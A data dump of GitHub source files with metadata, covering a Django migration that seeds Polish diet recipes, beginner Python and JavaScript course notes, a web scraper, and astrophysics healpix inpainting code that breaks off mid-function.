post(self,request):\n" }, { "alpha_fraction": 0.6483363509178162, "alphanum_fraction": 0.6698545813560486, "avg_line_length": 31.80392074584961, "blob_id": "f5a18959b22abfa10c03afd033ada26067098512", "content_id": "6d87a2d87d9aa25c6017a8969207726bfb4d15dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5070, "license_type": "no_license", "max_line_length": 137, "num_lines": 153, "path": "/jedzonko/migrations/0002_auto_20190507_1955.py", "repo_name": "Tomaszdud/ZaplanujWorkout", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0 on 2019-05-07 17:55\n\nfrom django.db import migrations\n\ndef add_DayNames(apps, schema_editor):\n # We can't import the Person model directly as it may be a newer\n # version than this migration expects. We use the historical version.\n DayName = apps.get_model('jedzonko', 'DayName')\n\n Days = {\n \"Monady\" : 8,\n \"Thusday\" : 9,\n \"Wensday\" : 10,\n \"Thursday\" : 11,\n \"Friday\": 12,\n \"Saturday\": 13,\n \"Sunday\" : 14\n }\n for key, value in Days.items():\n DayName.objects.create(name=key, order=value)\n\ndef add_Plans(apps, schema_editor):\n\n Plan = apps.get_model('jedzonko', 'Plan')\n\n Norway = {\n \"name\" : \"Dieta Norweska\",\n \"description\" : \"\"\"Opracowana przez lekarzy i specjalistów żywienia w Oslo.\n Zakłada restrykcyjną dietę trwającą 14 dni. Podstawą diety norweskiej są jajka i grejpfruty - muszą być w codziennym jadłospisie.\n Poza tym można jeść wybrane owoce i warzywa oraz gotowane mięso.\n W dwa tygodnie można schudnąć 10 kilogramów\"\"\"\n }\n\n Plan.objects.create(name=Norway[\"name\"], description=Norway[\"description\"])\n\n Espaniol = {\n \"name\" : \"Dieta hiszpańska\",\n \"description\" : \"\"\"Polega na obniżeniu spożycia kalorii - dziennie do 1000-1500 kcal.\n Oparta jest na owcach i warzywach. Zakłada zrzucenie 3-6 kilogramów w ciągu dwóch tygodni diety\"\"\"\n }\n\n Plan.objects.create(name=Espaniol[\"name\"], description=Espaniol[\"description\"])\n\ndef add_Recipes(apps, schema_editor):\n\n Recipe = apps.get_model('jedzonko','Recipe')\n\n Recipe.objects.create(\n name=\"Śnidanie po Norwesku\",\n ingredients=\"3 jajka, kawa\",\n description=\"Gotowane jajka z kawą bez mleka i cukru\",\n preparation_time=5,\n\tpreparation=\"gotuj jajka 2 minuty\",\n votes=2)\n\n Recipe.objects.create(\n name=\"Norweski obiad\",\n ingredients=\"2 jajka, porcja szpinaku, jogurt\",\n description=\"Jajka ze szpinakiem z dodatkiem jogurtu naturalnego\",\n preparation_time=15,\n\tpreparation=\"zagotuj jajka, dodaj porcję szpinaku i jogurtu wedle uznania\",\n votes=20)\n\n Recipe.objects.create(\n name=\"Hiszpańskie śniadanie\",\n ingredients=\"kawa bez cukru, 2 kromki pieczywa chrupkiego, 2 plasterki polędwicy drobiowej, jogurt beztłuszczowy naturalny\",\n description=\"Pieczywo chrupkie z polędwicą\",\n preparation_time=5,\n\tpreparation=\"zrób kanapki z przygotowanych składników\",\n votes=25)\n\n Recipe.objects.create(\n name=\"Obiad po Hiszpańsku\",\n ingredients=\"300 g warzyw z patelni (smażonych na oliwie z oliwek), jogurt naturalny\",\n description=\"Smażone warzywa\",\n preparation_time=20,\n\tpreparation=\"Smaż warzywa na patelni i dolej do nich jogurt naturalny\",\n votes=35)\n\n Recipe.objects.create(\n name=\"Hiszpańska Kolacja\",\n ingredients=\"sałatka pomidorowa polana sosem winegret, 2 plasterki szynki z indyka, pieczone jabłko\",\n description=\"Sałatka pomidorowa\",\n preparation_time=20,\n\tpreparation=\"Wszystkie składniki wrzuć do jednego naczynia i smacznego\",\n votes=60)\n\n# class RecipePlan(models.Model):\n# meal_name = models.CharField(max_length=255)\n# order = models.SmallIntegerField(unique=True)\n# recipe = models.ForeignKey('Recipe', on_delete=models.DO_NOTHING)\n# plan = models.ForeignKey('Plan', on_delete=models.DO_NOTHING)\n# day_name = models.ForeignKey('DayName', on_delete=models.DO_NOTHING)\n\ndef add_RecipePlans(apps, schema_editor):\n\n Recipe = apps.get_model('jedzonko','Recipe')\n DayName = apps.get_model('jedzonko', 'DayName')\n Plan = apps.get_model('jedzonko', 'Plan')\n RecipePlan = apps.get_model('jedzonko', 'RecipePlan')\n\n r1_1 = RecipePlan.objects.create(\n meal_name=\"r1 sniadanie\",\n order=1,\n plan = Plan.objects.get(pk=1),\n recipe = Recipe.objects.get(pk=1), #Śnidanie po Norwesku\n day_name = DayName.objects.get(pk=1)\n )\n\n r1_2 = RecipePlan.objects.create(\n meal_name=\"r1 obiad\",\n order=2,\n plan = Plan.objects.get(pk=1),\n recipe = Recipe.objects.get(pk=2), #Norweski obiad\n day_name = DayName.objects.get(pk=1),\n )\n\n r2_1 = RecipePlan.objects.create(\n meal_name=\"r2 śniadanie\",\n order=1,\n plan = Plan.objects.get(pk=2),\n recipe = Recipe.objects.get(pk=3), #Hiszpańskie śniadanie\n day_name = DayName.objects.get(pk=2),\n )\n\n r2_2 = RecipePlan.objects.create(\n meal_name=\"r2 obiad\",\n order=2,\n plan = Plan.objects.get(pk=2),\n recipe = Recipe.objects.get(pk=4), #Obiad po Hiszpańsku\n day_name = DayName.objects.get(pk=2)\n )\n\n r2_3 = RecipePlan.objects.create(\n meal_name=\"r2 kolacja\",\n order=3,\n plan = Plan.objects.get(pk=2),\n recipe = Recipe.objects.get(pk=5), #Hiszpańska Kolacja\n day_name = DayName.objects.get(pk=2)\n )\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('jedzonko', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(add_DayNames),\n migrations.RunPython(add_Plans),\n migrations.RunPython(add_Recipes),\n migrations.RunPython(add_RecipePlans),\n ]\n" } ]
5
xiam220/UdemyCourses
https://github.com/xiam220/UdemyCourses
824afe0a5bcc3b1e8affb848e3852dbb935b693e
2b81537423e2059ec5a990648ba54e8a4a1094bc
c44456f557d087b3c2879547f336e076ffeb73a9
refs/heads/main
2023-01-09T07:43:02.667330
2020-11-10T04:25:13
2020-11-10T04:25:13
311,533,458
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5648854970932007, "alphanum_fraction": 0.5708227157592773, "avg_line_length": 23.5625, "blob_id": "411ff775b0b10a5d9f4855ec7febf9180da27611", "content_id": "00accf820ee3301ef92233f86431329f85dde7b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1179, "license_type": "no_license", "max_line_length": 88, "num_lines": 48, "path": "/Python/StringMethods.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "String Functions\n greet = 'hellloooo'\n\n print(len(greet)) \n #Output: 9\n\n print(greet[0:len(greet)])\n #Output: hellloooo\n\nFormatted Strings\n name = 'Johnny'\n age = 55\n \n print(f'Hi {name}. You are {age} years old.')\n #Output: Hi Johnny. You are 55 years old. \n \n \"\"\"\n Alternative:\n print('Hi ' + name + '. You are ' + str(age) + ' years old.')\n \"\"\"\n \nString Methods\n quote = 'to be or not to be'\n\n #str.upper() #Modifies entire str to uppercase\n print(quote.upper())\n #Output: TO BE OR NOT TO BE\n\n #str.capitalize() #Capitalizes first character in str\n print(quote.capitalize()) \n #Output: To be or not to be\n\n #str.find('x') #Returns position of x if it exists\n print(quote.find('be'))\n #Output: 3\n\n #str.replace(old, new) #Replace all occurrences of old with new\n print(quote.replace('be', 'me'))\n #Output: to me or not to me\n\n print(quote)\n #Output: to be or not to be\n \n \"\"\"\n When we use methods, we are creating a new String\n We never modify the original String\n We are not assigning it to anything\n \"\"\"\n" }, { "alpha_fraction": 0.4277777671813965, "alphanum_fraction": 0.47469136118888855, "avg_line_length": 23.545454025268555, "blob_id": "4d4603046ee1f8466475d0ec3128397ccbbd8d2d", "content_id": "1efafed3d2000df6a660db1053f90d12c44f2cd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1620, "license_type": "no_license", "max_line_length": 102, "num_lines": 66, "path": "/Python/ListMethods.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "ListMethods1\n basket = [1, 2, 3, 4, 5]\n len(basket)\n #returns 5\n\n #Appending to list\n basket.append(100)\n #returns [1, 2, 3, 4, 5, 100]\n \n #Inserting to list\n basket.insert(4, 100)\n #returns [1, 2, 3, 4, 100, 5]\n \n #Extending list\n basket.extend([100, 101]) #Takes an iterable [that you can loop over]\n #returns [1, 2, 3, 4, 5, 100, 101] #Modifies the list in place and extends our list\n \n #basket.pop(i) #Removes element at position i\n basket.pop() #Removes last element in list \n #returns [1, 2, 3, 4, 5]\n \n basket.pop(0) \n #returns [2, 3, 4, 5]\n \n #basket.remove()\n basket.remove(4) #Pass value we want to remove\n #returns [2, 3, 5]\n \n \"\"\"\n .pop() returns whatever you just removed\n basket = [1, 2, 3, 4, 5]\n new_list = basket.pop(4)\n print(new_list)\n #Output: 5\n \"\"\"\n \n #Clear\n basket.clear()\n #returns []\n\nListMethods2\n basket = ['a', 'b', 'c', 'd', 'e']\n basket.index('d')\n #returns 3\n \n basket.index('d', 0, 3)\n \"\"\"\n Console:\n Traceback (most recent call last):\n ...\n ValueError: 'd' is not in list\n \"\"\"\n basket.index('d', 0, 4)\n #returns 3\n \n print('d' in basket)\n #Output: True\n \n print('i' in 'hi my name is Ian')\n #Output: True\n \n basket = ['a', 'b', 'c', 'd', 'e', 'd']\n \n #.count() #Count how many times an item occurs\n basket.count('d') \n #returns 2\n" }, { "alpha_fraction": 0.5035211443901062, "alphanum_fraction": 0.5704225301742554, "avg_line_length": 27.979591369628906, "blob_id": "10b1dedf3a9ad1048eb0a37039cacc26cf5effc0", "content_id": "ff0a0b5a61b199cbbfeba03a958421c25c255600", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1420, "license_type": "no_license", "max_line_length": 110, "num_lines": 49, "path": "/Python/StringIndexing.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "numbers = '01234567'\n \n print(numbers[0]) #return 0th index\n #Output: 0\n \n #numbers[0:i] #return 0th to ith index (not including ith position)\n print(numbers[0:2]) \n #Output: 01\n \n #numbers[start:stop:stepover] #return elements from start to stop, stepping over ever stepover\n print(numbers[0:8:2]) #return elements from 0 to 8, stepping over every 2nd\n #Output: 0246\n \n print(numbers[1:]) #start at 1 and print all the way to the end\n #Output: 1234567\n \n print(numbers[:5]) #start at 0 and stops at 5\n #Output: 01234\n \n print(numbers[::1]) #start at 0, stop at 8, step over by 1\n #Output: 01234567\n \n print(numbers[-1]) #start at the end\n #Output: 7\n print(numbers[-2])\n #Output: 6\n print(numbers[::-1])\n #Output: 76543210\n \n\"\"\"\nString are immutable, meaning they cannot be changed \nFor example, \n numbers = '01234567'\nYou can modify the variable type:\n numbers = 100\n print(numbers)\n #Output: 100 \nHowever, you can't change the String itself:\n numbers[0] = '8'\n print(numbers)\n #Output:\n Traceback (most recent call last):\n ...\n >\nThe only way to modify the String is to change the variable completely:\n numbers = '81234567'\n print(numbers[0])\n #Output: 8\n\"\"\"\n" }, { "alpha_fraction": 0.45126834511756897, "alphanum_fraction": 0.46595460176467896, "avg_line_length": 13.645833015441895, "blob_id": "d88e8f12a80d833ec35fae23ec79cb4a3b0b5a03", "content_id": "e150b0f6211b74673b968ecfc5a2737afc52ab87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 749, "license_type": "no_license", "max_line_length": 43, "num_lines": 48, "path": "/WebDevelopment/Javascript/WebpageJavascript/script.js", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "// function sayHello(){\r\n// console.log(\"Hello\");\r\n// }\r\n\r\n// sayHello();\r\n\r\n// var sayBye = function(){\r\n// console.log(\"Bye\");\r\n// }\r\n\r\n// sayBye();\r\n\r\n// function sing(song){\r\n// console.log(song);\r\n// }\r\n\r\n// sing(\"Laaa deee daa\");\r\n\r\n// function multiply(a, b){\r\n// return a * b;\r\n// }\r\n\r\n// multiply(5, 10);\r\n\r\n//parameters are a and b\r\n//arguments are 5, 10\r\n\r\nvar user = {\r\n name: \"John\",\r\n age: 34,\r\n hobby: \"Soccer\",\r\n isMarried: false,\r\n spells: [\"abrakadra\", \"shazam\", \"boo\"],\r\n shout: function(){\r\n console.log(\"AHHHHHHHH!\");\r\n }\r\n};\r\n\r\nvar list = [\r\n {\r\n username: \"andy\",\r\n password: \"secret\"\r\n },\r\n {\r\n username: \"jess\",\r\n password: \"123\"\r\n }\r\n]" }, { "alpha_fraction": 0.680341899394989, "alphanum_fraction": 0.6846153736114502, "avg_line_length": 27.299999237060547, "blob_id": "ce5408ee3eb2c12886af9f5ffb67d2c183513810", "content_id": "7d68acb7b89746a07adbfef888d216d53664ba7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1170, "license_type": "no_license", "max_line_length": 71, "num_lines": 40, "path": "/WebDevelopment/DOM-Manipulation/DOM-selectors/script.js", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "// var button = document.getElementsByTagName(\"button\")[0];\r\n// //button is an array\r\n// button.addEventListener(\"click\", function(){\r\n// console.log(\"CLICK!!!!\");\r\n// })\r\n\r\nvar button = document.getElementById(\"enter\");\r\nvar input = document.getElementById(\"userInput\");\r\nvar ul = document.querySelector(\"ul\");\r\n\r\nfunction inputLength(){\r\n return input.value.length;\r\n}\r\n\r\nfunction createListElement(){\r\n var li = document.createElement(\"li\");\r\n li.appendChild(document.createTextNode(input.value));\r\n ul.appendChild(li);\r\n input.value = \"\";\r\n}\r\n\r\nfunction addListAfterClick(){\r\n if(inputLength() > 0){\r\n createListElement();\r\n }\r\n}\r\n\r\nfunction addListAfterKeypress(event){\r\n if(inputLength() > 0 && event.keyCode === 13){\r\n createListElement();\r\n }\r\n}\r\n\r\n//Callback Functions: When that line of javascript runs, we don't want\r\n// the addListAfterClick function to run because we're adding the event\r\n//listener now to wait for click or keypress\r\n//We're passing a reference to the function without running it\r\nbutton.addEventListener(\"click\", addListAfterClick);\r\n\r\ninput.addEventListener(\"keypress\", addListAfterKeypress);" }, { "alpha_fraction": 0.6623376607894897, "alphanum_fraction": 0.6623376607894897, "avg_line_length": 50, "blob_id": "ab5d9f43e8ea4c0f41a428536cfdacbd7b4cd328", "content_id": "a24357437ad331b94ccefd1fdbec425c71b98f16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 68, "num_lines": 3, "path": "/Python/PasswordChecker.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "username = input(\"Enter your username: \")\r\npassword = input(\"Enter your password: \")\r\nprint(f\"Username: {username} \\n Password: \" + {'*' * len(password)})" }, { "alpha_fraction": 0.5715509653091431, "alphanum_fraction": 0.5912596583366394, "avg_line_length": 21.44230842590332, "blob_id": "caae67d4990d7d581430b14d7f1e810166dd5bcd", "content_id": "7ca412c2708d23ed17945865d563d2c22d18f4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1167, "license_type": "no_license", "max_line_length": 61, "num_lines": 52, "path": "/Python/Lists.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "Lists and List Splicing\n \"\"\"\n Lists are a form of arrays, a collection of items\n Lists are mutable, meaning they can be changed\n You are creating a new copy of a list\n \"\"\"\n\n amazon_cart = ['notebooks', 'sunglasses', 'toys', 'grapes']\n\n print(amazon_cart)\n #Output: ['notebooks', 'sunglasses', 'toys', 'grapes']\n\n print(amazon_cart[0])\n #Output: notebooks\n\n amazon_cart[0] = 'laptop'\n print(amazon_cart)\n #Output: ['laptop', 'sunglasses', 'toys', 'grapes']\n\n \"\"\"\n Changing the pointer of arr1 to arr2\n Modifications to arr1 or arr2 will modify the other array\n arr2 = arr1\n \"\"\"\n new_cart = amazon_cart\n new_cart = 'gum'\n print(new_cart)\n #Output: ['gum', 'sunglasses', 'toys', 'grapes']\n\n print(amazon_cart)\n #Output: ['gum', 'sunglasses', 'toys', 'grapes']\n\n \"\"\"\n Copying an array\n arr2 = arr1[:]\n \"\"\"\n new_cart = amazon_cart[:]\n new_cart[0] = 'gum'\n print(new_cart)\n #Output: ['gum', 'sunglasses', 'toys', 'grapes']\n\n print(amazong_cart)\n #Output: ['laptop', 'sunglasses', 'toys', 'grapes']\n \nMatrices\n matrix = [\n [1, 5, 1],\n [0, 1, 0],\n [1, 0, 1]\n ]\n print(matrix[0][1])\n #Output: 5\n" }, { "alpha_fraction": 0.6308540105819702, "alphanum_fraction": 0.6570248007774353, "avg_line_length": 22.133333206176758, "blob_id": "b0abd534dd9180d8c660134c732d09e32639550f", "content_id": "386513bc53d32b34998d252ab401c08116c3c7d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 726, "license_type": "no_license", "max_line_length": 60, "num_lines": 30, "path": "/Python/scrape.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "import requests #allows us to download the HTML\r\nfrom bs4 import BeautifulSoup\r\n\r\n #web browser without the actual window\r\nresponse = requests.get('https://news.ycombinator.com/news')\r\n# print(response.text)\r\n\r\n# parse HTML; creates a soup object\r\nsoup = BeautifulSoup(response.text, 'html.parser')\r\n# print(soup.body.contents)\r\n\r\n# print(soup.find_all('div'))\r\n# print(soup.title)\r\n\r\n# find the first a\r\n# print(soup.find('a'))\r\n\r\n# print(soup.find(id='score_24954495'))\r\n\r\n# uses CSS selectors\r\n# . --> class\r\n# print(soup.select('.score'))\r\n# # --> id\r\n# print(soup.select('#score_24954495'))\r\n\r\nlinks = soup.select('.storylink')\r\nvotes = soup.select('.score')\r\n# print(votes[0])\r\n\r\nprint(votes[0].get('id'))\r\n\r\n" }, { "alpha_fraction": 0.7018633484840393, "alphanum_fraction": 0.7018633484840393, "avg_line_length": 36.75, "blob_id": "7186d22c44317c499c79170912c7961c3b2532d2", "content_id": "038b104a30938830e2f8d64987b2578d02de2767", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 161, "license_type": "no_license", "max_line_length": 55, "num_lines": 4, "path": "/WebDevelopment/Javascript/exercise3_Calculator/Calculator.js", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "var firstNumber = prompt(\"Enter the first number: \");\r\nvar secondNumber = prompt(\"Enter the second number: \");\r\n\r\nconsole.log(firstNumber + secondNumber)\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6118143200874329, "alphanum_fraction": 0.6329113841056824, "avg_line_length": 22.549999237060547, "blob_id": "6c984a1af81c8b4eaff18c58340c8a3a79e24d92", "content_id": "910d8ac2db572bb93c85100897992aef672ee43d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 474, "license_type": "no_license", "max_line_length": 65, "num_lines": 20, "path": "/Python/PythonBasics1.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "Determine User Age\n birth_year = input('What year were you born?')\n age = 2019 - int(birth_year)\n print(f'Your age is: {age}')\n \n \"\"\"\n Console:\n What year were you born?1999\n Your age is: 20\n >\n \"\"\"\n\nPassword Checker\n username = input('Enter your username: ')\n password = input('Enter your password: ')\n \n password_length = len(password)\n hidden_password = '*' * password_length\n \n print(f'Username: {username} \\n Password: {hidden_password}')\n \n" } ]
10
sopXx/picasso
https://github.com/sopXx/picasso
794c3166bcafa1622f15cf4da91fcd911f093771
0e488112688b91fd879bb5a8d67b2eee0651bed2
1e1ff6d4f54ee4ed348c2593fae8ab0fe35b906a
refs/heads/master
2020-07-07T05:00:25.411225
2019-08-20T00:06:47
2019-08-20T00:06:47
203,258,424
0
0
null
2019-08-19T22:22:17
2019-08-16T19:41:20
2019-08-16T19:42:42
null
[ { "alpha_fraction": 0.632478654384613, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 28, "blob_id": "eccc13ad6f2e00e46376a6b75bb3a04838945396", "content_id": "f6a72a50483931f992d44e897c97623bf81611e9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "permissive", "max_line_length": 60, "num_lines": 4, "path": "/picasso/utils/__init__.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 Giuseppe Puglisi .\n# Full license can be found in the top level \"LICENSE\" file.\n\nfrom .utils import * \n" }, { "alpha_fraction": 0.5284327268600464, "alphanum_fraction": 0.5464632511138916, "avg_line_length": 27.799999237060547, "blob_id": "09bc7493c1f2ff0295f83eb031028b3fcce15ce1", "content_id": "8127f960f7dc391347748f92c2d4336c91682c72", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 721, "license_type": "permissive", "max_line_length": 83, "num_lines": 25, "path": "/picasso/inpainters/nn_inpainter.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "import numpy as np\n\n\nclass NN():\n\t\n\tdef NN_fill(mask, data, niter):\n\t\t'''\n\t\tmask: binary mask with the hole as 0, and the rest of as 1\n\t\tdata: input nonmasked data (1 channel)\n\t\tniter: number of iterations. The saturation iterations depends on the mask size. \n\t\t (a mask size of ~300 takes about ~50 iters) \n\t\t'''\n\t data = data.copy()\n\t mask_pos = np.where(mask==0)\n\t h, w = data.shape\n\t x, y = mask_pos\n\t data[~mask] = np.mean(data*mask)\n\t for i in range(niter):\n\t for r,c in zip(x,y):\n\t try:\n\t data[r,c] = data[(r-1):(r+2),(c-1):(c+2)].mean()\n\t except IndexError:\n\t \tprint('Mask index out of range')\n\t pass\n\t return data\n\t" }, { "alpha_fraction": 0.5861280560493469, "alphanum_fraction": 0.6006097793579102, "avg_line_length": 30.238094329833984, "blob_id": "950a728d7181c3a5e47547bc9211c413f8e37959", "content_id": "37f649252172e703f18973e5dc6a2970d084acaf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5248, "license_type": "permissive", "max_line_length": 137, "num_lines": 168, "path": "/picasso/MPI_stack2healpix.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "#\n#\n#\n#\n# date: 2019-08-20\n# author: GIUSEPPE PUGLISI\n# python3.6\n# Copyright (C) 2019 Giuseppe Puglisi [email protected]\n#\n\n\nimport healpy as hp\nimport numpy as np\nimport argparse\nfrom mpi4py import MPI\n\n\nfrom inpainters import (\n deep_prior_inpainter as dp ,\n contextual_attention_gan as ca,\n nn_inpainter as nn\n )\n\n\nfrom utils import utils\n\nfrom utils import (\n setup_input,\n set_header,\n f2h,\n rd2tp,\n numpy2png\n\n)\n\n\n\n\n\n\nclass HoleInpainter() :\n def __init__ (self, method , Npix = 128, modeldir = None, verbose= False ) :\n if method =='Deep-Prior':\n self.Inpainter = dp.DeepPrior ( (Npix, Npix, 1), verbose = verbose )\n self.epochs = 2#000\n Adaopt=\"Adam\"\n self.Inpainter.compile(optimizer=Adaopt )\n self.exec = self.DPinpaint\n \n elif method=='Contextual-Attention' :\n self.Inpainter = ca.ContextualAttention( modeldir =modeldir , verbose = verbose )\n self.exec = self.GANinpaint\n elif method=='NN' :\n self.Inpainter = nn.NN_fill(())\n \n pass\n\n\n def setup_input(self , fname ) :\n return self.Inpainter.setup_input( fname )\n\n\n\n def rescale_back (self, v ) :\n return ( v* (self.Inpainter.max - self.Inpainter.min) +\n self.Inpainter.min )\n\n\n def DPinpaint(self ) :\n\n self.Inpainter.train(self.Inpainter.Z , self.Inpainter.X , epochs=self.epochs )\n self.Inpainter.evaluate(self.Inpainter.Z,self.Inpainter.X)\n # predict and rescale back\n p = self.Inpainter.predict(self.Inpainter.Z)\n p = self.rescale_back(p )\n return p\n\n def GANinpaint (self ) :\n image = numpy2png(self.Inpainter.X )\n mask = numpy2png (1 - self.Inpainter.mask )\n\n p = self.Inpainter.predict(image, mask )\n p = self.rescale_back(p )\n\n return p\n\n\ndef main(args):\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n nprocs = comm.Get_size()\n Npix = 128 ## WARNING: This is hard-coded because of the architecture of both CNN\n\n glob_ra,glob_dec, _ = np.loadtxt(args.ptsourcefile ,unpack=True)\n\n localsize =np.int_( glob_ra.shape[0]/nprocs ) ## WARNING: this MUST evenly divide!!!!!!\n\n ra = glob_ra[slice( rank *localsize , (rank +1)* localsize)]\n dec = glob_dec[slice( rank *localsize , (rank +1)* localsize)]\n Nstacks= ra.shape [0]\n\n if args.pol :\n keys = ['T', 'Q', 'U']\n inputmap = hp.read_map(args.hpxmap ,field=[0,1,2] )\n else:\n keys = ['T' ]\n inputmap = [hp.read_map( args.hpxmap) ]\n\n\n mask = np.zeros_like (inputmap[0] )\n\n nside = hp.get_nside(inputmap)\n\n size_im = {2048: 192. ,4096 : 64., 32 :360. }\n beam =np.deg2rad( args.beamsize /60.)\n\n Inpainter = HoleInpainter (args.method,\n modeldir = args.checkpoint_dir,\n verbose =args.debug )\n\n for i in range(Nstacks):\n\n sizepatch = size_im[nside]*1. /Npix/60.\n header = set_header(ra[i],dec[i], sizepatch )\n tht,phi = rd2tp(ra[i],dec[i])\n vec = hp.ang2vec( theta = tht,phi =phi )\n pixs = hp.query_disc(nside,vec,3* beam)\n mask [pixs] = 1.\n for k,j in zip(keys, range(len(inputmap)) ) :\n fname = args.stackfile+k+'_{:.5f}_{:.5f}_masked.npy'.format(ra[i],dec[i] )\n fname = args.stackfile\n\n Inpainter.setup_input( fname )\n predicted = Inpainter.exec ()\n\n np.save(args.stackfile+k+'_{:.5f}_{:.5f}_inpainted.npy'.format(ra[i],dec[i] ), predicted)\n maskmap = f2h (predicted ,header, nside )\n inputmap[j][pixs] = inpaintedmap[pixs]\n break\n\n maps = np.concatenate(inputmap).reshape(hp.nside2npix(nside), len(inputmap))\n reducmaps = np.zeros_like(maps)\n globmask= np.zeros_like(mask)\n\n comm.Allreduce(maps, reducmaps, op=MPI.SUM)\n comm.Allreduce(mask, globmask , op=MPI.SUM)\n if rank ==0 :\n hp.write_map(args.inpaintedmap , [inputmap[k] *(1- globmask) + reducmaps[:,k] *globmask for k in range(len(inputmap))] )\n\n comm.Barrier()\n\n comm.Disconnect\n\n\n\nif __name__==\"__main__\":\n\tparser = argparse.ArgumentParser( description=\"prepare training and testing dataset from a healpix map \" )\n\tparser.add_argument(\"--hpxmap\" , help='path to the healpix map to be stacked, no extension ' )\n\tparser.add_argument(\"--beamsize\", help = 'beam size in arcminutes of the input map', type=np.float )\n\tparser.add_argument(\"--stackfile\", help='path to the file with stacked maps')\n\tparser.add_argument(\"--ptsourcefile\", help='path to the file with RA, Dec coordinates of sources to be inpainted ')\n\tparser.add_argument(\"--inpaintedmap\", help='path to the inpainted HEALPIX map ')\n\tparser.add_argument(\"--method\", help=\" string of inpainting technique, can be 'Deep-Prior', 'Contextual-Attention'. \")\n\tparser.add_argument(\"--pol\", action=\"store_true\" , default=False )\n\tparser.add_argument('--checkpoint_dir', default='', type=str,help='The directory of tensorflow checkpoint for the ContextualAttention.')\n\tparser.add_argument('--debug', default=False , action='store_true')\n\targs = parser.parse_args()\n\tmain( args)\n" }, { "alpha_fraction": 0.5613734126091003, "alphanum_fraction": 0.6025751233100891, "avg_line_length": 29.259740829467773, "blob_id": "de176a39c4e28ec69cf4040793940818d1dbad58", "content_id": "bae71570242f1d38054cb6dfda5d994e5e3cbb30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2330, "license_type": "permissive", "max_line_length": 74, "num_lines": 77, "path": "/picasso/utils/utils.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "import reproject\nimport numpy as np\nimport astropy.io.fits as fits\n\n\ndef h2f(hmap,target_header,coord_in='C'):\n #project healpix -> flatsky\n pr,footprint = reproject.reproject_from_healpix(\n (hmap, coord_in), target_header, shape_out=(500,500),\n order='nearest-neighbor', nested=False)\n return pr\n\ndef f2h(flat,target_header,nside,coord_in='C'):\n #project flatsky->healpix\n pr,footprint = reproject.reproject_to_healpix(\n (flat, target_header),coord_system_out='C', nside=nside ,\n order='nearest-neighbor', nested=False)\n return pr\n\ndef rd2tp(ra,dec):\n \"\"\"\n Convert ra,dec -> tht,phi\n \"\"\"\n tht = (-dec+90.0)/180.0*np.pi\n phi = ra/180.0*np.pi\n return tht,phi\n\ndef tp2rd(tht,phi):\n \"\"\"\n Convert tht,phi -> ra,dec\n \"\"\"\n ra = phi/np.pi*180.0\n dec = -1*(tht/np.pi*180.0-90.0)\n return ra,dec\n\n\ndef set_header(ra,dec, size_patch ,Npix=128 ):\n hdr = fits.Header()\n hdr.set('SIMPLE' , 'T')\n hdr.set('BITPIX' , -32)\n hdr.set('NAXIS' , 2)\n hdr.set('NAXIS1' , Npix)\n hdr.set('NAXIS2' , Npix )\n hdr.set('CRVAL1' , ra)\n hdr.set('CRVAL2' , dec)\n hdr.set('CRPIX1' , Npix/2. +.5)\n hdr.set('CRPIX2' , Npix/2. +.5 )\n hdr.set('CD1_1' , size_patch )\n hdr.set('CD2_2' , -size_patch )\n hdr.set('CD2_1' , 0.0000000)\n hdr.set('CD1_2' , -0.0000000)\n hdr.set('CTYPE1' , 'RA---ZEA')\n hdr.set('CTYPE2' , 'DEC--ZEA')\n hdr.set('CUNIT1' , 'deg')\n hdr.set('CUNIT2' , 'deg')\n hdr.set('COORDSYS','icrs')\n return hdr\n\n\ndef numpy2png (arr ):\n image = np.uint8( 255 * arr )\n # replicate image to the 3 channels\n image = image [:,:,None] * np.ones(3, dtype=int)[None, None, :]\n return image\n\ndef setup_input ( fname_masked, seed= 123456789, method = 'Deep-Prior' ):\n 